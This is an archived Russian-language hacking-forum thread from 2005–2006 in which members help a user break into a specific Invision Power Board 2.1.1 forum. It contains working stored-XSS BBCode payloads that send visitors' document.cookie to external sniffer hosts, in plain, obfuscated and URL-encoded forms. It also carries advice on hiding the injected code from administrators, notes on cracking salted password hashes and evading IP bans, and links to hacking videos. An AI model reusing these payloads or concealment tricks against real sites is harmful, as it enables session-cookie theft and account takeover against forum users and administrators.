Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос по эксплойту для Ipb 2.1.1. (https://forum.antichat.xyz/showthread.php?t=12167)

Zheca 26.12.2005 13:43

Вопрос по эксплойту для Ipb 2.1.1.
 
Привет! Нужен эксплойт для Ipb 2.1.1. Кто нить может помочь?

FQziT 26.12.2005 14:27

Код HTML:

[post=1000[topic=target style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]      [/topic]]


[/post]

Поудаляй все звёздочки из спец. символов. И про репу не забываем ;-)

Zheca 26.12.2005 18:18

Седня вошел на форум-жертву тока хеш расшифровывать както в лом (по моему долгое это занятие). Естественно чтоб попасть в админку требует пароль юзера. Подскажите пожалуйста, есть какие нить реальные проги по раскодированию хэшей и может быть есть способ по другому попасть в админку.
ПС: FQziT за код спасибо - как проверю, если сработает + к репе с меня

max_pain89 26.12.2005 18:35

IPB 2.x ты хэш не расшифруешь
почему? - юзай поиск...

Zheca 26.12.2005 18:58

Цитата:

Сообщение от max_pain89
IPB 2.x ты хэш не расшифруешь
почему? - юзай поиск...

вот хэщ - 52371906352bc10de868a5b733134888 - его возможно расшифровать?

FQziT 26.12.2005 19:26

Zheca
Нет. И пользуйся поиском по форуму. Об этом уже говорили.

Zheca 26.12.2005 19:51

Ок! Все понял - кончаю тупить

Zheca 26.12.2005 23:21

Ввел код в сообщение - ниче не вышло - наверное я гдето лишнюю звездочку убрал

max_pain89 26.12.2005 23:23

это уже где-то публиковали, так что надеюсь никто не против
http://kobeluga.narod.ru/codes.txt

member_ru 26.12.2005 23:23

Там короче соль. Соль - это шифруется шифрованный пароль. Вот так.
Качай видео по взлому :
http://video.antichat.net/archive/coyl/ipb2.rar
http://video.antichat.net/archive/MicRo/ipb.rar
http://video.antichat.net/archive/Li...mer/ipb20x.rar
Всё.

Zheca 27.12.2005 22:48

+ к репе FQziT

Tem 27.12.2005 23:05

Смотря под чего блокали ? если по айпи то некак (только прокси),под ник если просто зареги новый и удали куки и файлы.

Zheca 27.12.2005 23:11

А если хост отрезали - то я понимаю тока прокси остается?

Zheca 29.12.2005 22:39

Отсканил сервак и получил " возможно, выполнить произвольный код на уязвимость системе". Есть эксплойт. Кто нить может ссылочку дать ссылочку?

FQziT 30.12.2005 13:24

Zheca Ты читать вообще умеешь?! Причём тут DDos атака и форумы IPB 2.1.1??? И вобще Античат против ДДоса.

Zheca 30.12.2005 14:41

Спасиб конечно за -1 :(( Я знаю что Античат против ДДос. Может я непонятно выразился - но я не собираюсь ддосить - меня интересует сторочка о выполнении произвольного кода. А сканил я сервак с установленным на нем ипб 2.1.1

И еще вопрос: а возможно всатвление кода не в пост а в название темы при ее создании?

Zheca 31.12.2005 01:10

На воруме который я ломаю админ - гад уж больно прбитый и глазастый. Сходу вычисляет ссылочку на снифер - удаляет пост и юзера. Может быть стоит какая нить защита, которая активируется как тока я выкладываю ссылку на снифер?

Otaku 31.12.2005 03:59

Глазастый админ это прикольно=)
А серьёзно. Какой нибудь способ автоматом ловить внедрённый сниффер есть?

maXaTTAck 01.01.2006 14:18

Вопросик появился: После внедрения этого зловредного кода остается что-то вроде [topic/]]. Можно ли этого избежать?

slime 01.01.2006 16:06

Цитата:

Сообщение от maXaTTAck
Вопросик появился: После внедрения этого зловредного кода остается что-то вроде [topic/]]. Можно ли этого избежать?

Если что-то остается, то можно замаскировать под цвет фона хы-хы...
но хз... у мя ничего не оставалось никогда...

по поводу глазастых админов...
не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом....

оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано.

maXaTTAck 02.01.2006 23:05

Помог такой код:

Код HTML:

[EMAIL]wj@wj.com[URL=wj/style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/URL][/EMAIL]
Вопрос: А как закодировать в такие вот коды сниффер http://s.netsec.ru/sec/pic.gif

Имеется в виду символы адреса в код

•••™NO FEAR™••• 02.01.2006 23:10

Код:

%5BEMAIL%5Dwj@wj.com%5BURL%3Dwj/style%3Dbackground%3Aurl%28javascript%3Adocument.images%5B1%5D.src%3D%22http%3A//s.netsec.ru/sec/pic.gif%3F%22document.cookie%29%3B%20%5D%5B/URL%5D%5B/EMAIL%5D

На вот так вроде!

Tem 02.01.2006 23:16

Можеш тут _http://webmastertools.narod.ru/OnlineTools/url_decode.html , поменяй сылку на снифер _http://antichat.ru/cgi-bin/s.jpg на http://s.netsec.ru/sec/pic.gif , и кодируй.

Zheca 13.01.2006 19:06

А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно

Azazel 13.01.2006 19:39

Цитата:

Сообщение от Zheca
А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно

Ты получаешь куки только с той страницы на которой отображается твоё сообщение. Сомневаюсь что многие будут листать топик назад и читать, допустим вторую его страницу, а не последнии сообщения, допустим на десятой.

Zheca 13.01.2006 19:45

Это понятно - это будет работать? - или нужно обязательно создавать новый пост?

Azazel 13.01.2006 20:17

Будет, при условии что оно отобразится на страничке у жертвы.

Zheca 13.01.2006 22:05

Эт я к вопросам по поводу того, что текст кода виден из других браузеров - и админ удаляет посты. Ведб это выход - запостится, подождать пока накопятся сообщения, и пока не совершился переход на следующую страницу - изменить свой первый пост вставив туда код. Пару, тройку юзеров можно поймать вот таким образом

Humor 28.01.2006 00:16

Цитата:

Сообщение от slime
Если что-то остается, то можно замаскировать под цвет фона хы-хы...
но хз... у мя ничего не оставалось никогда...

по поводу глазастых админов...
не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом....

оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано.

Нет это не правильно, прочти http://forum.antichat.ru/showthread.php?t=11807 Я дал пример как это можно реальзивать. ` тут СОВСЕМ не причем!


Время: 16:33